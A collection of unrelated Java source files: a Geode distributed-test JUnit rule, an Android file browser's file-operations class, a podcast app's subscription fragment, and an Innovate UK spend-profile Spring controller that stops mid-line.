@Before public void setUp() { // host name and port see: arangodb.properties configuration = new ArangoDBConfiguration(); tmpClient = new ArangoDBSimpleGraphClient(configuration); // delete graph deleteGraph(graphName); // delete test collections deleteCollection(edges); deleteCollection(vertices); } @After public void tearDown() { } }
/* * Licensed to the Apache Software Foundation (ASF) under one or more contributor license * agreements. See the NOTICE file distributed with this work for additional information regarding * copyright ownership. The ASF licenses this file to You under the Apache License, Version 2.0 (the * "License"); you may not use this file except in compliance with the License. You may obtain a * copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software distributed under the License * is distributed on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express * or implied. See the License for the specific language governing permissions and limitations under * the License. */ package org.apache.geode.test.dunit.rules; import static org.apache.geode.test.dunit.Disconnect.disconnectFromDS; import static org.apache.geode.test.dunit.DistributedTestUtils.unregisterInstantiatorsInThisVM; import static org.apache.geode.test.dunit.Invoke.invokeInEveryVM; import static org.apache.geode.test.dunit.Invoke.invokeInLocator; import static org.apache.geode.test.dunit.VM.DEFAULT_VM_COUNT; import static org.apache.geode.test.dunit.VM.getVM; import static org.assertj.core.api.Assertions.assertThat; import org.apache.geode.cache.query.QueryTestUtils; import org.apache.geode.cache.query.internal.QueryObserverHolder; import org.apache.geode.cache30.ClientServerTestCase; import org.apache.geode.cache30.RegionTestCase; import org.apache.geode.distributed.internal.DistributionConfig; import org.apache.geode.distributed.internal.DistributionMessageObserver; import org.apache.geode.distributed.internal.InternalDistributedSystem; import org.apache.geode.distributed.internal.tcpserver.TcpClient; import org.apache.geode.internal.admin.ClientStatsManager; import org.apache.geode.internal.cache.DiskStoreObserver; import org.apache.geode.internal.cache.InitialImageOperation; import org.apache.geode.internal.cache.tier.InternalClientMembership; import org.apache.geode.internal.cache.tier.sockets.CacheServerTestUtil; import org.apache.geode.internal.cache.tier.sockets.ClientProxyMembershipID; import org.apache.geode.internal.cache.tier.sockets.Message; import org.apache.geode.internal.cache.xmlcache.CacheCreation; import org.apache.geode.internal.net.SocketCreator; import org.apache.geode.internal.net.SocketCreatorFactory; import org.apache.geode.management.internal.cli.LogWrapper; import org.apache.geode.pdx.internal.TypeRegistry; import org.apache.geode.test.dunit.IgnoredException; import org.apache.geode.test.dunit.standalone.DUnitLauncher; import org.apache.geode.test.junit.rules.serializable.SerializableExternalResource; /** * JUnit Rule that launches DistributedTest VMs and scans all log output for suspect strings without * {@code DistributedTestCase}. The test class may need to implement {@code Serializable} if it * uses lambdas to perform {@code RMI} invocations on {@code VM}s. * * <p> * {@code DistributedRule} can be used in DistributedTests as a {@code Rule}. This will ensure * that checking for suspect strings is performed after each test method. * * <pre> * {@literal @}Rule * public DistributedRule distributedRule = new DistributedRule(); * * {@literal @}Test * public void shouldHaveFourVMsByDefault() { * assertThat(getVMCount()).isEqualTo(4); * } * </pre> * * <p> * You may specify a non-default number of {@code VM}s for the test when constructing * {@code DistributedRule}. * * <p> * Example of specifying fewer that the default number of {@code VM}s (which is 4): * * <pre> * {@literal @}Rule * public DistributedRule distributedRule = new DistributedRule(1); * * {@literal @}Test * public void hasOneVM() { * assertThat(getVMCount()).isEqualTo(1); * } * </pre> * * <p> * Example of specifying greater that the default number of {@code VM}s (which is 4): * * <pre> * {@literal @}Rule * public DistributedRule distributedRule = new DistributedRule(8); * * {@literal @}Test * public void hasEightVMs() { * assertThat(getVMCount()).isEqualTo(8); * } * </pre> * * <p> * {@code DistributedRule} can also be used in DistributedTests as a {@code ClassRule}. This ensures * that DUnit VMs will be available to non-Class {@code Rule}s. However, you may want to declare * {@code DistributedRule.TearDown} as a non-Class {@code Rule} so that check for suspect strings is * performed after each test method. * * <pre> * {@literal @}ClassRule * public static DistributedRule distributedRule = new DistributedRule(); * * {@literal @}Rule * public DistributedRule.TearDown distributedRuleTearDown = new DistributedRule.TearDown(); * * {@literal @}Test * public void shouldHaveFourDUnitVMsByDefault() { * assertThat(getVMCount()).isEqualTo(4); * } * </pre> */ @SuppressWarnings("unused") public class DistributedRule extends AbstractDistributedRule { private final int vmCount; /** * Use {@code Builder} for more options in constructing {@code DistributedRule}. */ public static Builder builder() { return new Builder(); } /** * Constructs DistributedRule and launches the default number of {@code VM}s (which is 4). */ public DistributedRule() { this(new Builder()); } /** * Constructs DistributedRule and launches the specified number of {@code VM}s. * * @param vmCount specified number of VMs */ public DistributedRule(final int vmCount) { this(new Builder().withVMCount(vmCount)); } DistributedRule(final Builder builder) { super(builder.vmCount); vmCount = builder.vmCount; } @Override protected void before() { DUnitLauncher.launchIfNeeded(vmCount); for (int i = 0; i < vmCount; i++) { assertThat(getVM(i)).isNotNull(); } } @Override protected void after() { TearDown.doTearDown(); } /** * Builds an instance of DistributedRule. */ public static class Builder { private int vmCount = DEFAULT_VM_COUNT; public Builder withVMCount(final int vmCount) { if (vmCount < 0) { throw new IllegalArgumentException("VM count must be positive integer"); } this.vmCount = vmCount; return this; } public DistributedRule build() { return new DistributedRule(this); } } /** * Cleans up horrendous things like static state and non-default instances in Geode. * * <p> * {@link DistributedRule#after()} invokes the same cleanup that this Rule does, but if you * defined {@code DistributedRule} as a {@code ClassRule} then you should declare TearDown * as a non-class {@code Rule} in your test: * * <pre> * {@literal @}ClassRule * public static DistributedRule distributedRule = new DistributedRule(); * * {@literal @}Rule * public DistributedRule.TearDown tearDownRule = new DistributedRule.TearDown(); * * {@literal @}Test * public void shouldHaveFourDUnitVMsByDefault() { * assertThat(getVMCount()).isEqualTo(4); * } * </pre> * * <p> * Note: {@link CacheRule} handles its own cleanup of Cache and Regions. */ public static class TearDown extends SerializableExternalResource { @Override protected void before() { // nothing } @Override protected void after() { doTearDown(); } static void doTearDown() { tearDownInVM(); invokeInEveryVM(() -> { tearDownInVM(); }); invokeInLocator(() -> { DistributionMessageObserver.setInstance(null); unregisterInstantiatorsInThisVM(); }); DUnitLauncher.closeAndCheckForSuspects(); } public static void tearDownInVM() { // 1. Please do NOT add to this list. I'm trying to DELETE this list. // 2. Instead, please add to the after() of your test or your rule. disconnectFromDS(); // keep alphabetized to detect duplicate lines CacheCreation.clearThreadLocals(); CacheServerTestUtil.clearCacheReference(); ClientProxyMembershipID.system = null; ClientServerTestCase.AUTO_LOAD_BALANCE = false; ClientStatsManager.cleanupForTests(); DiskStoreObserver.setInstance(null); unregisterInstantiatorsInThisVM(); DistributionMessageObserver.setInstance(null); InitialImageOperation.slowImageProcessing = 0; InternalClientMembership.unregisterAllListeners(); LogWrapper.close(); QueryObserverHolder.reset(); QueryTestUtils.setCache(null); RegionTestCase.preSnapshotRegion = null; SocketCreator.resetHostNameCache(); SocketCreator.resolve_dns = true; TcpClient.clearStaticData(); // clear system properties -- keep alphabetized System.clearProperty(DistributionConfig.GEMFIRE_PREFIX + "log-level"); System.clearProperty("jgroups.resolve_dns"); System.clearProperty(Message.MAX_MESSAGE_SIZE_PROPERTY); if (InternalDistributedSystem.systemAttemptingReconnect != null) { InternalDistributedSystem.systemAttemptingReconnect.stopReconnecting(); } IgnoredException.removeAllExpectedExceptions(); SocketCreatorFactory.close(); TypeRegistry.setPdxSerializer(null); TypeRegistry.init(); } } }
package com.aditya.filebrowser.fileoperations; import android.app.ProgressDialog; import android.content.Context; import android.content.DialogInterface; import android.content.Intent; import android.content.pm.PackageManager; import android.content.pm.ResolveInfo; import android.net.Uri; import android.os.Handler; import android.support.v7.app.AlertDialog; import com.aditya.filebrowser.Constants; import com.aditya.filebrowser.NavigationHelper; import com.aditya.filebrowser.R; import com.aditya.filebrowser.utils.UIUpdateHelper; import com.aditya.filebrowser.interfaces.IFuncPtr; import com.aditya.filebrowser.models.FileItem; import com.aditya.filebrowser.utils.UIUtils; import org.apache.commons.io.FileUtils; import java.io.File; import java.io.IOException; import java.text.SimpleDateFormat; import java.util.ArrayList; import java.util.List; import java.util.concurrent.ExecutorService; import java.util.concurrent.Executors; /** * Created by Aditya on 4/15/2017. */ public class FileIO { ExecutorService executor; Handler mUIUpdateHandler; Context mContext; UIUpdateHelper mHelper; NavigationHelper mNavigationHelper; public FileIO(NavigationHelper mNavigationHelper,Handler mUIUpdateHandler, Context mContext) { this.mUIUpdateHandler = mUIUpdateHandler; this.mContext = mContext; this.mNavigationHelper = mNavigationHelper; mHelper = new UIUpdateHelper(mNavigationHelper, mContext); executor = Executors.newFixedThreadPool(1); } public void createDirectory(final File path) { if(path.getParentFile()!=null && path.getParentFile().canWrite()) { executor.execute(new Runnable() { @Override public void run() { try { FileUtils.forceMkdir(path); mUIUpdateHandler.post(mHelper.updateRunner()); } catch (IOException e) { e.printStackTrace(); mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while creating a new folder")); } } }); } else { UIUtils.ShowToast("No Write Permission Granted",mContext); } } public void deleteItems(final List<FileItem> selectedItems) { if(selectedItems!=null && selectedItems.size()>0) { AlertDialog confirmDialog = new AlertDialog.Builder(mContext) .setTitle("Delete Files") .setMessage("Are you sure you want to delete " + selectedItems.size() + " items?") .setPositiveButton(android.R.string.yes, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int which) { // continue with delete final ProgressDialog progressDialog = new ProgressDialog(mContext); progressDialog.setTitle("Deleting Please Wait... "); progressDialog.setProgressStyle(ProgressDialog.STYLE_HORIZONTAL); progressDialog.setCancelable(false); progressDialog.setProgress(0); progressDialog.setMessage(""); progressDialog.show(); executor.execute(new Runnable() { @Override public void run() { int i = 0; float TOTAL_ITEMS = selectedItems.size(); try { for (; i < selectedItems.size(); i++) { mUIUpdateHandler.post(mHelper.progressUpdater(progressDialog, (int)((i/TOTAL_ITEMS)*100), "File: "+selectedItems.get(i).getFile().getName())); if (selectedItems.get(i).getFile().isDirectory()) { FileUtils.deleteDirectory(selectedItems.get(i).getFile()); } else { FileUtils.forceDelete(selectedItems.get(i).getFile()); } } mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog)); mUIUpdateHandler.post(mHelper.updateRunner()); } catch (IOException e) { e.printStackTrace(); mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog)); mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while deleting ")); } } }); } }) .setNegativeButton(android.R.string.no, new DialogInterface.OnClickListener() { public void onClick(DialogInterface dialog, int which) { // do nothing dialog.dismiss(); } }) .setIcon(android.R.drawable.ic_dialog_alert) .show(); } else { UIUtils.ShowToast("No Items Selected!",mContext); } } public void pasteFiles(final File destination) { final Operations op = Operations.getInstance(mContext); final List<FileItem> selectedItems = op.getSelectedFiles(); final Operations.FILE_OPERATIONS operation = op.getOperation(); if(destination.canWrite()) { if (selectedItems != null && selectedItems.size() > 0) { final ProgressDialog progressDialog = new ProgressDialog(mContext); String title = "Please Wait... "; progressDialog.setTitle(title); if (operation == Operations.FILE_OPERATIONS.COPY) progressDialog.setTitle("Copying " + title); else if (operation == Operations.FILE_OPERATIONS.CUT) progressDialog.setTitle("Moving " + title); progressDialog.setProgressStyle(ProgressDialog.STYLE_HORIZONTAL); progressDialog.setCancelable(false); progressDialog.setMessage(""); progressDialog.setProgress(0); progressDialog.show(); executor.execute(new Runnable() { @Override public void run() { int i = 0; float TOTAL_ITEMS = selectedItems.size(); try { for (; i < selectedItems.size(); i++) { mUIUpdateHandler.post(mHelper.progressUpdater(progressDialog, (int) ((i / TOTAL_ITEMS) * 100), "File: " + selectedItems.get(i).getFile().getName())); if (selectedItems.get(i).getFile().isDirectory()) { if (operation == Operations.FILE_OPERATIONS.CUT) FileUtils.moveDirectory(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName())); else if (operation == Operations.FILE_OPERATIONS.COPY) FileUtils.copyDirectory(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName())); } else { if (operation == Operations.FILE_OPERATIONS.CUT) FileUtils.moveFile(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName())); else if (operation == Operations.FILE_OPERATIONS.COPY) FileUtils.copyFile(selectedItems.get(i).getFile(), new File(destination, selectedItems.get(i).getFile().getName())); } } mUIUpdateHandler.post(new Runnable() { @Override public void run() { op.resetOperation(); } }); mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog)); mUIUpdateHandler.post(mHelper.updateRunner()); } catch (IOException e) { e.printStackTrace(); mUIUpdateHandler.post(mHelper.toggleProgressBarVisibility(progressDialog)); mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while pasting ")); } } }); } else { UIUtils.ShowToast("No Items Selected!", mContext); } } else { UIUtils.ShowToast("No Write permissions for the paste directory",mContext); } } public void renameFile(final FileItem fileItem) { UIUtils.showEditTextDialog(mContext, "Rename", fileItem.getFile().getName() ,new IFuncPtr() { @Override public void execute(final String val) { executor.execute(new Runnable() { @Override public void run() { try { if(fileItem.getFile().isDirectory()) FileUtils.moveDirectory(fileItem.getFile(),new File(fileItem.getFile().getParentFile(), val.trim())); else FileUtils.moveFile(fileItem.getFile(),new File(fileItem.getFile().getParentFile(), val.trim())); mUIUpdateHandler.post(mHelper.updateRunner()); } catch (Exception e) { e.printStackTrace(); mUIUpdateHandler.post(mHelper.errorRunner("An error occurred while renaming ")); } } }); } }); } public void getProperties(List<FileItem> selectedItems) { StringBuilder msg = new StringBuilder(); if(selectedItems.size()==1) { boolean isDirectory = (selectedItems.get(0).getFile().isDirectory()); String type = isDirectory?"Directory":"File"; String size = FileUtils.byteCountToDisplaySize(isDirectory?FileUtils.sizeOfDirectory(selectedItems.get(0).getFile()):FileUtils.sizeOf(selectedItems.get(0).getFile())); String lastModified = new SimpleDateFormat(Constants.DATE_FORMAT).format(selectedItems.get(0).getFile().lastModified()); msg.append("Type : " + type + "\n\n"); msg.append("Size : " + size + "\n\n"); msg.append("Last Modified : " + lastModified + "\n\n"); msg.append("Path : "+selectedItems.get(0).getFile().getAbsolutePath()); } else { long totalSize = 0; for(int i=0;i<selectedItems.size();i++) { boolean isDirectory = (selectedItems.get(i).getFile().isDirectory()); totalSize += isDirectory?FileUtils.sizeOfDirectory(selectedItems.get(i).getFile()):FileUtils.sizeOf(selectedItems.get(i).getFile()); } msg.append("Type : " + "Multiple Files" + "\n\n"); msg.append("Size : " + FileUtils.byteCountToDisplaySize(totalSize) + "\n\n"); } UIUtils.ShowMsg(msg.toString(),"Properties",mContext); } public void shareMultipleFiles(List<FileItem> filesToBeShared){ ArrayList<Uri> uris = new ArrayList<>(); for(FileItem file: filesToBeShared){ uris.add(Uri.fromFile(file.getFile())); } final Intent intent = new Intent(Intent.ACTION_SEND_MULTIPLE); intent.setType("*/*"); intent.putParcelableArrayListExtra(Intent.EXTRA_STREAM, uris); PackageManager manager = mContext.getPackageManager(); List<ResolveInfo> infos = manager.queryIntentActivities(intent, 0); if (infos.size() > 0) { mContext.startActivity(Intent.createChooser(intent, mContext.getString(R.string.share))); } else { UIUtils.ShowToast("No app found to handle sharing",mContext); } } }
package com.clem.ipoca1.fragment; import android.content.DialogInterface; import android.content.Intent; import android.os.Bundle; import android.support.v4.app.Fragment; import android.support.v4.view.ViewCompat; import android.util.Log; import android.view.ContextMenu; import android.view.LayoutInflater; import android.view.MenuInflater; import android.view.MenuItem; import android.view.View; import android.view.ViewGroup; import android.widget.AdapterView; import android.widget.GridView; import com.clem.ipoca1.R; import com.clem.ipoca1.activity.MainActivity; import com.clem.ipoca1.adapter.SubscriptionsAdapter; import com.clem.ipoca1.core.asynctask.FeedRemover; import com.clem.ipoca1.core.dialog.ConfirmationDialog; import com.clem.ipoca1.core.feed.EventDistributor; import com.clem.ipoca1.core.feed.Feed; import com.clem.ipoca1.core.preferences.PlaybackPreferences; import com.clem.ipoca1.core.service.playback.PlaybackService; import com.clem.ipoca1.core.storage.DBReader; import com.clem.ipoca1.core.storage.DBWriter; import com.clem.ipoca1.core.util.FeedItemUtil; import com.clem.ipoca1.dialog.RenameFeedDialog; import rx.Observable; import rx.Subscription; import rx.android.schedulers.AndroidSchedulers; import rx.schedulers.Schedulers; /** * Fragment for displaying feed subscriptions */ public class SubscriptionFragment extends Fragment { public static final String TAG = "SubscriptionFragment"; private static final int EVENTS = EventDistributor.FEED_LIST_UPDATE | EventDistributor.UNREAD_ITEMS_UPDATE; private GridView subscriptionGridLayout; private DBReader.NavDrawerData navDrawerData; private SubscriptionsAdapter subscriptionAdapter; private int mPosition = -1; private Subscription subscription; public SubscriptionFragment() { } @Override public void onCreate(Bundle savedInstanceState) { super.onCreate(savedInstanceState); setRetainInstance(true); // So, we certainly *don't* have an options menu, // but unless we say we do, old options menus sometimes // persist. mfietz thinks this causes the ActionBar to be invalidated setHasOptionsMenu(true); } @Override public View onCreateView(LayoutInflater inflater, ViewGroup container, Bundle savedInstanceState) { View root = inflater.inflate(R.layout.fragment_subscriptions, container, false); subscriptionGridLayout = (GridView) root.findViewById(R.id.subscriptions_grid); ViewCompat.setNestedScrollingEnabled(subscriptionGridLayout, true); registerForContextMenu(subscriptionGridLayout); return root; } @Override public void onActivityCreated(Bundle savedInstanceState) { super.onActivityCreated(savedInstanceState); loadSubscriptions(); if (getActivity() instanceof MainActivity) { ((MainActivity) getActivity()).getSupportActionBar().setTitle(R.string.subscriptions_label); } EventDistributor.getInstance().register(contentUpdate); } @Override public void onDestroy() { super.onDestroy(); if (subscription != null) { subscription.unsubscribe(); } } private void loadSubscriptions() { if (subscription != null) { subscription.unsubscribe(); } subscription = Observable.fromCallable(DBReader::getNavDrawerData) .subscribeOn(Schedulers.newThread()) .observeOn(AndroidSchedulers.mainThread()) .subscribe(result -> { navDrawerData = result; subscriptionAdapter = new SubscriptionsAdapter((MainActivity) getActivity(), itemAccess); subscriptionGridLayout.setAdapter(subscriptionAdapter); subscriptionGridLayout.setOnItemClickListener(subscriptionAdapter); }, error -> Log.e(TAG, Log.getStackTraceString(error))); } @Override public void onCreateContextMenu(ContextMenu menu, View v, ContextMenu.ContextMenuInfo menuInfo) { super.onCreateContextMenu(menu, v, menuInfo); AdapterView.AdapterContextMenuInfo adapterInfo = (AdapterView.AdapterContextMenuInfo) menuInfo; int position = adapterInfo.position; Object selectedObject = subscriptionAdapter.getItem(position); if (selectedObject.equals(SubscriptionsAdapter.ADD_ITEM_OBJ)) { mPosition = position; return; } Feed feed = (Feed) selectedObject; MenuInflater inflater = getActivity().getMenuInflater(); inflater.inflate(R.menu.nav_feed_context, menu); menu.setHeaderTitle(feed.getTitle()); mPosition = position; } @Override public boolean onContextItemSelected(MenuItem item) { final int position = mPosition; mPosition = -1; // reset if (position < 0) { return false; } Object selectedObject = subscriptionAdapter.getItem(position); if (selectedObject.equals(SubscriptionsAdapter.ADD_ITEM_OBJ)) { // this is the add object, do nothing return false; } Feed feed = (Feed) selectedObject; switch (item.getItemId()) { case R.id.mark_all_seen_item: Observable.fromCallable(() -> DBWriter.markFeedSeen(feed.getId())) .subscribeOn(Schedulers.newThread()) .observeOn(AndroidSchedulers.mainThread()) .subscribe(result -> loadSubscriptions(), error -> Log.e(TAG, Log.getStackTraceString(error))); return true; case R.id.mark_all_read_item: Observable.fromCallable(() -> DBWriter.markFeedRead(feed.getId())) .subscribeOn(Schedulers.newThread()) .observeOn(AndroidSchedulers.mainThread()) .subscribe(result -> loadSubscriptions(), error -> Log.e(TAG, Log.getStackTraceString(error))); return true; case R.id.rename_item: new RenameFeedDialog(getActivity(), feed).show(); return true; case R.id.remove_item: final FeedRemover remover = new FeedRemover(getContext(), feed) { @Override protected void onPostExecute(Void result) { super.onPostExecute(result); loadSubscriptions(); } }; ConfirmationDialog conDialog = new ConfirmationDialog(getContext(), R.string.remove_feed_label, getString(R.string.feed_delete_confirmation_msg, feed.getTitle())) { @Override public void onConfirmButtonPressed( DialogInterface dialog) { dialog.dismiss(); long mediaId = PlaybackPreferences.getCurrentlyPlayingFeedMediaId(); if (mediaId > 0 && FeedItemUtil.indexOfItemWithMediaId(feed.getItems(), mediaId) >= 0) { Log.d(TAG, "Currently playing episode is about to be deleted, skipping"); remover.skipOnCompletion = true; int playerStatus = PlaybackPreferences.getCurrentPlayerStatus(); if (playerStatus == PlaybackPreferences.PLAYER_STATUS_PLAYING) { getActivity().sendBroadcast(new Intent( PlaybackService.ACTION_PAUSE_PLAY_CURRENT_EPISODE)); } } remover.executeAsync(); } }; conDialog.createNewDialog().show(); return true; default: return super.onContextItemSelected(item); } } @Override public void onResume() { super.onResume(); loadSubscriptions(); } private EventDistributor.EventListener contentUpdate = new EventDistributor.EventListener() { @Override public void update(EventDistributor eventDistributor, Integer arg) { if ((EVENTS & arg) != 0) { Log.d(TAG, "Received contentUpdate Intent."); loadSubscriptions(); } } }; private SubscriptionsAdapter.ItemAccess itemAccess = new SubscriptionsAdapter.ItemAccess() { @Override public int getCount() { if (navDrawerData != null) { return navDrawerData.feeds.size(); } else { return 0; } } @Override public Feed getItem(int position) { if (navDrawerData != null && 0 <= position && position < navDrawerData.feeds.size()) { return navDrawerData.feeds.get(position); } else { return null; } } @Override public int getFeedCounter(long feedId) { return navDrawerData != null ? navDrawerData.feedCounters.get(feedId) : 0; } }; }
package org.innovateuk.ifs.project.spendprofile.controller; import org.innovateuk.ifs.commons.service.ServiceResult; import org.innovateuk.ifs.competition.resource.CompetitionResource; import org.innovateuk.ifs.competition.service.CompetitionRestService; import org.innovateuk.ifs.controller.ValidationHandler; import org.innovateuk.ifs.organisation.resource.OrganisationResource; import org.innovateuk.ifs.project.ProjectService; import org.innovateuk.ifs.project.core.ProjectParticipantRole; import org.innovateuk.ifs.project.monitoring.service.MonitoringOfficerRestService; import org.innovateuk.ifs.project.resource.ApprovalType; import org.innovateuk.ifs.project.resource.ProjectOrganisationCompositeId; import org.innovateuk.ifs.project.resource.ProjectResource; import org.innovateuk.ifs.project.resource.ProjectUserResource; import org.innovateuk.ifs.project.spendprofile.SpendProfileSummaryModel; import org.innovateuk.ifs.project.spendprofile.SpendProfileTableCalculator; import org.innovateuk.ifs.project.spendprofile.form.SpendProfileForm; import org.innovateuk.ifs.project.spendprofile.form.SpendProfileReviewForm; import org.innovateuk.ifs.project.spendprofile.resource.SpendProfileResource; import org.innovateuk.ifs.project.spendprofile.resource.SpendProfileTableResource; import org.innovateuk.ifs.project.spendprofile.validation.SpendProfileCostValidator; import org.innovateuk.ifs.project.spendprofile.viewmodel.ProjectSpendProfileProjectSummaryViewModel; import org.innovateuk.ifs.project.spendprofile.viewmodel.ProjectSpendProfileViewModel; import org.innovateuk.ifs.project.status.resource.ProjectTeamStatusResource; import org.innovateuk.ifs.spendprofile.OrganisationReviewDetails; import org.innovateuk.ifs.spendprofile.SpendProfileService; import org.innovateuk.ifs.status.StatusService; import org.innovateuk.ifs.user.resource.UserResource; import org.innovateuk.ifs.user.service.OrganisationRestService; import org.innovateuk.ifs.util.PrioritySorting; import org.springframework.beans.factory.annotation.Autowired; import org.springframework.beans.factory.annotation.Qualifier; import org.springframework.beans.factory.annotation.Value; import org.springframework.security.access.prepost.PreAuthorize; import org.springframework.security.core.parameters.P; import org.springframework.stereotype.Controller; import org.springframework.ui.Model; import org.springframework.validation.BindingResult; import org.springframework.validation.ObjectError; import org.springframework.web.bind.annotation.*; import java.math.BigDecimal; import java.util.*; import java.util.function.Supplier; import java.util.stream.Collectors; import static org.innovateuk.ifs.commons.error.CommonFailureKeys.SPEND_PROFILE_CANNOT_MARK_AS_COMPLETE_BECAUSE_SPEND_HIGHER_THAN_ELIGIBLE; import static org.innovateuk.ifs.competition.publiccontent.resource.FundingType.LOAN; import static org.innovateuk.ifs.project.constant.ProjectActivityStates.COMPLETE; import static org.innovateuk.ifs.project.constant.ProjectActivityStates.LEAD_ACTION_REQUIRED; import static org.innovateuk.ifs.util.CollectionFunctions.simpleFindFirst; /** * This controller will handle all requests that are related to spend profile. */ @Controller @RequestMapping("/" + ProjectSpendProfileController.BASE_DIR + "/{projectId}/partner-organisation/{organisationId}/spend-profile") public class ProjectSpendProfileController { static final String BASE_DIR = "project"; private static final String REVIEW_TEMPLATE_NAME = "spend-profile-review"; private static final String FORM_ATTR_NAME = "form"; @Autowired private ProjectService projectService; @Autowired private StatusService statusService; @Autowired private OrganisationRestService organisationRestService; @Autowired private SpendProfileService spendProfileService; @Autowired private SpendProfileTableCalculator spendProfileTableCalculator; @Autowired @Qualifier("spendProfileCostValidator") private SpendProfileCostValidator spendProfileCostValidator; @Autowired private CompetitionRestService competitionRestService; @Autowired private MonitoringOfficerRestService monitoringOfficerRestService; @Value("${ifs.monitoringofficer.spendprofile.update.enabled}") private boolean moSpendProfileJourneyUpdateEnabled; @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')") @GetMapping public String viewSpendProfile(@ModelAttribute(value = "form", binding = false) SpendProfileReviewForm form, Model model, @P("projectId")@PathVariable("projectId") final Long projectId, @PathVariable("organisationId") final Long organisationId, UserResource loggedInUser) { ProjectResource projectResource = projectService.getById(projectId); boolean isMonitoringOfficer = monitoringOfficerRestService.isMonitoringOfficerOnProject(projectId, loggedInUser.getId()).getSuccess(); if (isMonitoringOfficer || isUserPartOfLeadOrganisation(projectId, loggedInUser)) { return viewProjectManagerSpendProfile(model, projectResource, loggedInUser, isMonitoringOfficer); } return reviewSpendProfilePage(model, projectId, organisationId, loggedInUser); } @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')") @GetMapping("/review") public String reviewSpendProfilePage(Model model, @P("projectId")@PathVariable("projectId") final Long projectId, @PathVariable("organisationId") final Long organisationId, UserResource loggedInUser) { model.addAttribute("model", buildSpendProfileViewModel(projectId, organisationId, loggedInUser)); model.addAttribute(FORM_ATTR_NAME, null); return BASE_DIR + "/spend-profile"; } @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'REVIEW_SPEND_PROFILE')") @PostMapping public String submitSpendProfileReview(Model model, @ModelAttribute(value = "form") SpendProfileReviewForm form, @SuppressWarnings("unused") BindingResult bindingResult, ValidationHandler validationHandler, @P("projectId")@PathVariable Long projectId, @PathVariable("organisationId") final Long organisationId, UserResource loggedInUser) { Supplier<String> failureView = () -> viewSpendProfile(form, model , projectId, organisationId, loggedInUser); ApprovalType approvalType = form.isApproved() ? ApprovalType.APPROVED : ApprovalType.REJECTED; ServiceResult<Void> generateResult = spendProfileService.approveOrRejectSpendProfile(projectId, approvalType); return validationHandler.addAnyErrors(generateResult).failNowOrSucceedWith(failureView, () -> submitSpendProfileReviewSuccessView(projectId) ); } private String submitSpendProfileReviewSuccessView(Long projectId) { return "redirect:/project/" + projectId; } @PreAuthorize("hasPermission(new org.innovateuk.ifs.project.resource.ProjectOrganisationCompositeId(#projectId, #organisationId), 'EDIT_SPEND_PROFILE_SECTION')") @GetMapping("/edit") public String editSpendProfile(Model model, @ModelAttribute(name = FORM_ATTR_NAME, binding = false) SpendProfileForm form, @SuppressWarnings("unused") BindingResult bindingResult, ValidationHandler validationHandler, @P("projectId")@PathVariable("projectId") final Long projectId, @P("organisationId")@PathVariable("organisationId") final Long organisationId, UserResource loggedInUser) { String failureView = "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile"; ProjectResource projectResource = projectService.getById(projectId); SpendProfileTableResource spendProfileTableResource = spendProfileService.getSpendProfileTable(projectId, organisationId); form.setTable(spendProfileTableResource); if (!spendProfileTableResource.getMarkedAsComplete()) { model.addAttribute("model", buildSpendProfileViewModel(projectResource, organisationId, spendProfileTableResource, loggedInUser)); return validationHandler.failNowOrSucceedWith(() -> BASE_DIR + "/spend-profile", () -> BASE_DIR + "/spend-profile"); } else { ServiceResult<Void> result = markSpendProfileIncomplete(projectId, organisationId); return validationHandler.addAnyErrors(result).failNowOrSucceedWith(() -> failureView, () -> { model.addAttribute("model", buildSpendProfileViewModel(projectResource, organisationId, spendProfileTableResource, loggedInUser)); return BASE_DIR + "/spend-profile"; }); } } @PreAuthorize("hasPermission(#projectId, 'org.innovateuk.ifs.project.resource.ProjectCompositeId', 'ACCESS_SPEND_PROFILE_SECTION')") @PostMapping("/edit") public String saveSpendProfile(Model model, @ModelAttribute(FORM_ATTR_NAME) SpendProfileForm form, @SuppressWarnings("unused") BindingResult bindingResult, ValidationHandler validationHandler, @P("projectId")@PathVariable("projectId") final Long projectId, @PathVariable("organisationId") final Long organisationId, UserResource loggedInUser) { Supplier<String> failureView = () -> { SpendProfileTableResource updatedTable = form.getTable(); SpendProfileTableResource originalTableWithUpdatedCosts = spendProfileService.getSpendProfileTable(projectId, organisationId); originalTableWithUpdatedCosts.setMonthlyCostsPerCategoryMap(updatedTable.getMonthlyCostsPerCategoryMap()); ProjectResource project = projectService.getById(projectId); return doEditSpendProfile(model, form, organisationId, loggedInUser, project, originalTableWithUpdatedCosts); }; spendProfileCostValidator.validate(form.getTable(), bindingResult); return validationHandler.failNowOrSucceedWith(failureView, () -> { SpendProfileTableResource spendProfileTableResource = spendProfileService.getSpendProfileTable(projectId, organisationId); spendProfileTableResource.setMonthlyCostsPerCategoryMap(form.getTable().getMonthlyCostsPerCategoryMap()); // update existing resource with user entered fields ServiceResult<Void> result = spendProfileService.saveSpendProfile(projectId, organisationId, spendProfileTableResource); return validationHandler.addAnyErrors(result).failNowOrSucceedWith(failureView, () -> saveSpendProfileSuccessView(projectId, organisationId, loggedInUser.getId())); }); } private String saveSpendProfileSuccessView(final Long projectId, final Long organisationId, final Long userId) { final String urlSuffix = projectService.isUserLeadPartner(projectId, userId) ? "/review" : ""; return "redirect:/project/" + projectId + "/partner-organisation/" + organisationId + "/spend-profile" + urlSuffix; } @PreAuthorize("hasPermission(#projectId, 